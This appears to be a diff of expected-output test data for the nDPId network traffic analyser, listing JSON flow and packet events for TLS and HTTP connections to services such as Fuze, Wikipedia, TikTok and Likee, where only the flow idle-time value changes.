-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, 
CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222051753,"flow_last_seen":1623222051753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222051753,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222051753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051753,"pkt":"pJGxgjQ56CrqthSFCABFAAA0YDdAAIAGW9bAqAHjNElH4sOXAbv6yL58AAAAAIAC+vC20AAAAgQFtAEDAwgBAQQC"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222051852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051852,"pkt":"6CrqthSFpJGxgjQ5CABFAAA0AABAAOkGUw00SUfiwKgB4wG7w5czz+y6+si+fYASaQMoIwAAAgQFtAEBBAIBAwMI"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222051853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623222051853,"pkt":"pJGxgjQ56CrqthSFCABFAAAoYDhAAIAGW+HAqAHjNElH4sOXAbv6yL59M8\/su1AQAgHP+AAAAAAAAAAA"} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, 
CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":67,"packets-processed":66,"total-skipped-flows":0,"total-l4-data-len":17875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1623223595952} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223595952,"flow_last_seen":1623223595952,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223595952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223595952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZBhAAEAGCeXAqAGAW8au0MW8AbvaIBcHAAAAAKAC+vC78AAAAgQFtAQCCAq86k7VAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223595999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595999,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfP1bxq7QwKgBgAG7xbxrNtsg2iAXCKASqbDzDgAAAgQFnAQCCAoXn7wwvOpO1QEDAwk="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223596002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623223596002,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0ZBlAAEAGCezAqAGAW8au0MW8AbvaIBcIazbbIYAQAfbJTQAAAQEICrzqTwcXn7ww"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223595952,"flow_last_seen":1623223595952,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223595952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223595952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZBhAAEAGCeXAqAGAW8au0MW8AbvaIBcHAAAAAKAC+vC78AAAAgQFtAQCCAq86k7VAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223595999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595999,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfP1bxq7QwKgBgAG7xbxrNtsg2iAXCKASqbDzDgAAAgQFnAQCCAoXn7wwvOpO1QEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223596002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623223596002,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0ZBlAAEAGCezAqAGAW8au0MW8AbvaIBcIazbbIYAQAfbJTQAAAQEICrzqTwcXn7ww"} 
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":119,"packets-processed":118,"total-skipped-flows":0,"total-l4-data-len":35609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1623226283573} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226283573,"flow_last_seen":1623226283573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226283573,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623226283573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623226283573,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8M5RAAEAGJgDAqAH6LVLxM5vSAFAXgCu+AAAAAKAC\/\/9tawAAAgQFtAQCCAolvfRMAAAAAAEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623226283601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623226283601,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA0AABAADMGZpwtUvEzwKgB+gBQm9LNImc9F4Arv4ASchAIQAAAAgQFeAEBBAIBAwMK"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623226283602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623226283602,"pkt":"pJGxgjQ5AoEfHBPlCABFAAAoM5VAAEAGJhPAqAH6LVLxM5vSAFAXgCu\/zSJnPlAQAKy6PQAAAAAAAAAA"} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226283573,"flow_last_seen":1623226283573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226283573,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623226283573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623226283573,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8M5RAAEAGJgDAqAH6LVLxM5vSAFAXgCu+AAAAAKAC\/\/9tawAAAgQFtAQCCAolvfRMAAAAAAEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623226283601,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623226283601,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA0AABAADMGZpwtUvEzwKgB+gBQm9LNImc9F4Arv4ASchAIQAAAAgQFeAEBBAIBAwMK"} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623226283602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623226283602,"pkt":"pJGxgjQ5AoEfHBPlCABFAAAoM5VAAEAGJhPAqAH6LVLxM5vSAFAXgCu\/zSJnPlAQAKy6PQAAAAAAAAAA"} +00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":231,"packets-processed":230,"total-skipped-flows":0,"total-l4-data-len":108050,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1631088115362} 
